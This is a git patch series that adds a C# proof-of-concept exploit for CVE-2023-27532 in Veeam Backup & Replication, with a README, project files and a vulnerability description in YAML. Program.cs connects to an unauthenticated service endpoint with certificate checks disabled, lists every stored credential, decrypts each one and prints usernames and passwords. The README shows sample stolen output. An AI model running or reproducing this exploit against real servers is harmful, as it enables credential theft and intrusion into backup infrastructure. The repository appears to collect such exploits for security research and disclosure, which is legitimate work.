From 7a69987535bc6d497ba2c993397a412d33d64be5 Mon Sep 17 00:00:00 2001 From: dalianpanzi Date: Fri, 7 Apr 2023 07:54:47 +0000 Subject: [PATCH 1/8] add cve/Veeam/2023/CVE-2023-27532/README.md. Signed-off-by: dalianpanzi --- cve/Veeam/2023/CVE-2023-27532/README.md | 31 +++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cve/Veeam/2023/CVE-2023-27532/README.md diff --git a/cve/Veeam/2023/CVE-2023-27532/README.md b/cve/Veeam/2023/CVE-2023-27532/README.md new file mode 100644 index 00000000..58c4533a --- /dev/null +++ b/cve/Veeam/2023/CVE-2023-27532/README.md @@ -0,0 +1,31 @@ +# CVE-2023-27532 +POC for CVE-2023-27532 affecting Veeam Backup and Replication + +## Technical Analysis +A technical root cause analysis of the vulnerability can be found on our blog: +https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive + +## Summary +This POC abuses an unsecured API endpoint to extract credentials. + +## Usage +```plaintext +/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/ +UserName = dev Password = Super Secret Password +UserName = root Password = +UserName = root Password = +UserName = root Password = +UserName = root Password = +``` + +## Mitigations +Update to the latest version or mitigate by following the instructions within the Veeam Advisory +* https://www.veeam.com/kb4424 + +## Follow the Horizon3.ai Attack Team on Twitter for the latest security research: +* [Horizon3 Attack Team](https://twitter.com/Horizon3Attack) +* [James Horseman](https://twitter.com/JamesHorseman2) +* [Zach Hanley](https://twitter.com/hacks_zach) + +## Disclaimer +This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly. -- Gitee From 4d143326747a5d1a58b04676c253c9120ba60228 Mon Sep 17 00:00:00 2001 From: dalianpanzi Date: Fri, 7 Apr 2023 07:55:31 +0000 Subject: [PATCH 2/8] add cve/Veeam/2023/CVE-2023-27532/Veeam_CVE-2023-27532.sln. Signed-off-by: dalianpanzi --- .../2023/CVE-2023-27532/Veeam_CVE-2023-27532.sln | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 cve/Veeam/2023/CVE-2023-27532/Veeam_CVE-2023-27532.sln diff --git a/cve/Veeam/2023/CVE-2023-27532/Veeam_CVE-2023-27532.sln b/cve/Veeam/2023/CVE-2023-27532/Veeam_CVE-2023-27532.sln new file mode 100644 index 00000000..cc235c5f --- /dev/null +++ b/cve/Veeam/2023/CVE-2023-27532/Veeam_CVE-2023-27532.sln @@ -0,0 +1,16 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "CVE-2023-27532", "CVE-2023-27532\CVE-2023-27532.csproj", "{0B4F72A8-5A34-4D8C-B588-44D11A3A8576}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Any CPU = Debug|Any CPU + Release|Any CPU = Release|Any CPU + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {0B4F72A8-5A34-4D8C-B588-44D11A3A8576}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {0B4F72A8-5A34-4D8C-B588-44D11A3A8576}.Debug|Any CPU.Build.0 = Debug|Any CPU + {0B4F72A8-5A34-4D8C-B588-44D11A3A8576}.Release|Any CPU.ActiveCfg = Release|Any CPU + {0B4F72A8-5A34-4D8C-B588-44D11A3A8576}.Release|Any CPU.Build.0 = Release|Any CPU + EndGlobalSection +EndGlobal \ No newline at end of file -- Gitee From f129594cf6ac0d2973d9c694ab5781fbb0659245 Mon Sep 17 00:00:00 2001 From: dalianpanzi Date: Fri, 7 Apr 2023 07:56:20 +0000 Subject: [PATCH 3/8] add cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/BinaryProxy.cs. Signed-off-by: dalianpanzi --- .../CVE-2023-27532/BinaryProxy.cs | 78 +++++++++++++++++++ 1 file changed, 78 insertions(+) create mode 100644 cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/BinaryProxy.cs diff --git a/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/BinaryProxy.cs b/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/BinaryProxy.cs new file mode 100644 index 00000000..26bd33b7 --- /dev/null +++ b/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/BinaryProxy.cs @@ -0,0 +1,78 @@ +using System.Runtime.Serialization; + +//https://stackoverflow.com/questions/13594831/binaryformatter-is-it-possible-to-deserialize-known-class-without-the-assembly +namespace CVE_2023_27532; + +class ProxyTestClass +{ + private Dictionary data = new Dictionary(); + + public Object GetData(string name) + { + if (data.ContainsKey(name)) + { + return data[name]; + } + + return null; + } + + public void SetData(string name, object value) + { + data[name] = value; + } + + public IEnumerable> Dump() + { + return data; + } +} + +class SurrogateTestClassConstructor : ISerializationSurrogate +{ + private ProxyTestClass mProxy; + + /// + /// Populates the provided with the data needed to serialize the object. + /// + /// The object to serialize. + /// The to populate with data. + /// The destination (see ) for this serialization. + /// The caller does not have the required permission. + public void GetObjectData(object obj, SerializationInfo info, StreamingContext context) + { + throw new NotImplementedException(); + } + + /// + /// Populates the object using the information in the . + /// + /// + /// The populated deserialized object. + /// + /// The object to populate. + /// The information to populate the object. + /// The source from which the object is deserialized. + /// The surrogate selector where the search for a compatible surrogate begins. + /// The caller does not have the required permission. + public object SetObjectData(object obj, SerializationInfo info, StreamingContext context, + ISurrogateSelector selector) + { + if (mProxy == null) mProxy = new ProxyTestClass(); + var en = info.GetEnumerator(); + while (en.MoveNext()) + { + mProxy.SetData(en.Current.Name, en.Current.Value); + } + + return mProxy; + } +} + +sealed class DeserializeBinder : SerializationBinder +{ + public override Type BindToType(string assemblyName, string typeName) + { + return typeof(ProxyTestClass); + } +} \ No newline at end of file -- Gitee From b7abd4db040d7b9f1046662aacc44a805287fea4 Mon Sep 17 00:00:00 2001 From: dalianpanzi Date: Fri, 7 Apr 2023 07:56:43 +0000 Subject: [PATCH 4/8] add cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/CVE-2023-27532.csproj. Signed-off-by: dalianpanzi --- .../CVE-2023-27532/CVE-2023-27532.csproj | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/CVE-2023-27532.csproj diff --git a/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/CVE-2023-27532.csproj b/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/CVE-2023-27532.csproj new file mode 100644 index 00000000..270c2911 --- /dev/null +++ b/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/CVE-2023-27532.csproj @@ -0,0 +1,16 @@ + + + + Exe + net6.0 + CVE_2023_27532 + enable + enable + + + + + + + + \ No newline at end of file -- Gitee From 98d5bd8b47b65e9e820685e6409ed8021aa09b69 Mon Sep 17 00:00:00 2001 From: dalianpanzi Date: Fri, 7 Apr 2023 07:57:12 +0000 Subject: [PATCH 5/8] add cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/Program.cs. Signed-off-by: dalianpanzi --- .../CVE-2023-27532/CVE-2023-27532/Program.cs | 116 ++++++++++++++++++ 1 file changed, 116 insertions(+) create mode 100644 cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/Program.cs diff --git a/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/Program.cs b/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/Program.cs new file mode 100644 index 00000000..bb9992cd --- /dev/null +++ b/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/Program.cs @@ -0,0 +1,116 @@ +using System.Runtime.Serialization; +using System.Runtime.Serialization.Formatters.Binary; +using System.ServiceModel; +using System.ServiceModel.Security; +using System.Text; +using System.Text.RegularExpressions; +using System.Xml; + +namespace CVE_2023_27532; + +class Program +{ + static List GetCredGuids(IRemoteInvokeService proxy) + { + MemoryStream memoryStream = new MemoryStream(); + BinaryFormatter binaryFormatter = new BinaryFormatter(); +#pragma warning disable SYSLIB0011 + binaryFormatter.Serialize(memoryStream, true); +#pragma warning restore SYSLIB0011 + string base64 = Convert.ToBase64String(memoryStream.ToArray()); + + var xml = "" + + "\n" + + "\n" + + $"\n" + + "\n" + + ""; + + var response = proxy.Invoke(ERemoteInvokeScope.DatabaseManager, + ERemoteInvokeMethod.CredentialsDbScopeGetAllCreds, + xml); + + XmlDocument doc = new XmlDocument(); + doc.LoadXml(response); + XmlNodeList paramNodes = doc.GetElementsByTagName("Param"); + String paramValue = paramNodes[0].Attributes["ParamValue"].Value; + byte[] decoded = Convert.FromBase64String(paramValue); + String str = Encoding.UTF8.GetString(decoded); + Regex regex = new Regex(@"\$(\w{8}-\w{4}-\w{4}-\w{4}-\w{12})"); + MatchCollection matches = regex.Matches(str); + List guids = new List(); + + foreach (Match match in matches) { + string guidString = match.Groups[1].Value; + guids.Add(guidString); + } + + return guids; + } + + static void GetCred(String guid, IRemoteInvokeService proxy) + { + MemoryStream memoryStream = new MemoryStream(); + BinaryFormatter binaryFormatter = new BinaryFormatter(); +#pragma warning disable SYSLIB0011 + binaryFormatter.Serialize(memoryStream, new Guid(guid)); +#pragma warning restore SYSLIB0011 + string base64 = Convert.ToBase64String(memoryStream.ToArray()); + + var xml = "" + + "\n" + + "\n" + + $"\n" + + "\n" + + ""; + + var response = proxy.Invoke(ERemoteInvokeScope.DatabaseManager, + ERemoteInvokeMethod.CredentialsDbScopeFindCredentials, + xml); + + XmlDocument doc = new XmlDocument(); + doc.LoadXml(response); + XmlNodeList paramNodes = doc.GetElementsByTagName("Param"); + String paramValue = paramNodes[0].Attributes["ParamValue"].Value; + byte[] decoded = Convert.FromBase64String(paramValue); + + //https://stackoverflow.com/questions/13594831/binaryformatter-is-it-possible-to-deserialize-known-class-without-the-assembly + var surrSel = new SurrogateSelector(); + surrSel.AddSurrogate(typeof(ProxyTestClass), new StreamingContext(StreamingContextStates.All), new + SurrogateTestClassConstructor()); + BinaryFormatter formatter = new BinaryFormatter(); + formatter.Binder = new DeserializeBinder(); + formatter.SurrogateSelector = surrSel; + + var deserializeObj = formatter.Deserialize(new MemoryStream(decoded)) as ProxyTestClass; + foreach (var c in deserializeObj.Dump()) + { + if (c.Key == "UserName" || c.Key == "Password") + { + Console.Write("{0} = {1} ", c.Key, c.Value); + } + } + Console.WriteLine(); + } + + static void Main(string[] args) + { + var address = args[0]; + var binding = new NetTcpBinding(SecurityMode.Transport); + binding.Security.Transport.ClientCredentialType = TcpClientCredentialType.None; + var dnsIdentity = new DnsEndpointIdentity("Veeam Backup Server Certificate"); + var endpointAddress = new EndpointAddress(new Uri(address), dnsIdentity); + + ChannelFactory factory = + new ChannelFactory(binding, endpointAddress); + factory.Credentials.ServiceCertificate.Authentication.CertificateValidationMode = + X509CertificateValidationMode.None; + + IRemoteInvokeService proxy = factory.CreateChannel(); + var guids = GetCredGuids(proxy); + foreach (var guid in guids) + { + GetCred(guid, proxy); + } + } +} \ No newline at end of file -- Gitee From 8aa38b04c84de020d8f91190ce1bf973ecb12a6d Mon Sep 17 00:00:00 2001 From: dalianpanzi Date: Fri, 7 Apr 2023 07:57:42 +0000 Subject: [PATCH 6/8] add cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/RemoteInvokeInterface.cs. Signed-off-by: dalianpanzi --- .../CVE-2023-27532/RemoteInvokeInterface.cs | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/RemoteInvokeInterface.cs diff --git a/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/RemoteInvokeInterface.cs b/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/RemoteInvokeInterface.cs new file mode 100644 index 00000000..82378739 --- /dev/null +++ b/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/RemoteInvokeInterface.cs @@ -0,0 +1,24 @@ +using System.Runtime.Serialization; +using System.ServiceModel; + +namespace CVE_2023_27532; + +[DataContract(Name = "InvokeScope")] +public enum ERemoteInvokeScope +{ + [EnumMember] DatabaseManager, +} + +[DataContract(Name = "InvokeMethod")] +public enum ERemoteInvokeMethod +{ + [EnumMember] CredentialsDbScopeFindCredentials, + [EnumMember] CredentialsDbScopeGetAllCreds, +} + +[ServiceContract(Name = "IRemoteInvokeService")] +public interface IRemoteInvokeService +{ + [OperationContract] + string Invoke(ERemoteInvokeScope scope, ERemoteInvokeMethod method, string parameters); +} \ No newline at end of file -- Gitee From 2b82215cafebf03903279bb86bc99c5fbd1b9bdc Mon Sep 17 00:00:00 2001 From: dalianpanzi Date: Fri, 7 Apr 2023 08:03:18 +0000 Subject: [PATCH 7/8] add cve/Veeam/2023/yaml/CVE-2023-27532.yaml. Signed-off-by: dalianpanzi --- cve/Veeam/2023/yaml/CVE-2023-27532.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 cve/Veeam/2023/yaml/CVE-2023-27532.yaml diff --git a/cve/Veeam/2023/yaml/CVE-2023-27532.yaml b/cve/Veeam/2023/yaml/CVE-2023-27532.yaml new file mode 100644 index 00000000..b5eb9edc --- /dev/null +++ b/cve/Veeam/2023/yaml/CVE-2023-27532.yaml @@ -0,0 +1,18 @@ +id: CVE-2023-27532 +source: https://github.com/horizon3ai/CVE-2023-27532 +info: + name: Veeam Backup&Replication是一套专门为VMware vSphere和Microsoft Hyper-V虚拟环境开发的备份方案,主要是在数据保护和灾难恢复方面提供了一整套的功能。 + severity: HIGH + description: Veeam备份和复制组件中的漏洞允许获取存储在配置数据库中的加密凭据。这可能会导致获得对备份基础结构主机的访问权限。 + scope-of-influence: + Veeam Backup & Replication + reference: + - https://nvd.nist.gov/vuln/detail/cve-2023-27532 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-27532 + cwe-id: CWE-306 + cnvd-id: None + kve-id: None + tags: Veeam Backup & Replication, 数据库 \ No newline at end of file -- Gitee From 6b0c22f3312c15a5a96a826e3d08a9a71eb9a32b Mon Sep 17 00:00:00 2001 From: dalianpanzi Date: Fri, 7 Apr 2023 08:06:41 +0000 Subject: [PATCH 8/8] update openkylin_list.yaml. Signed-off-by: dalianpanzi --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 7128c8a6..4f486a3e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -164,6 +164,8 @@ cve: - CVE-2021-43798 Froxlor: - CVE-2023-0315 + Veeam: + - CVE-2023-27532 cnvd: apache-tomcat: - CNVD-2020-10487 -- Gitee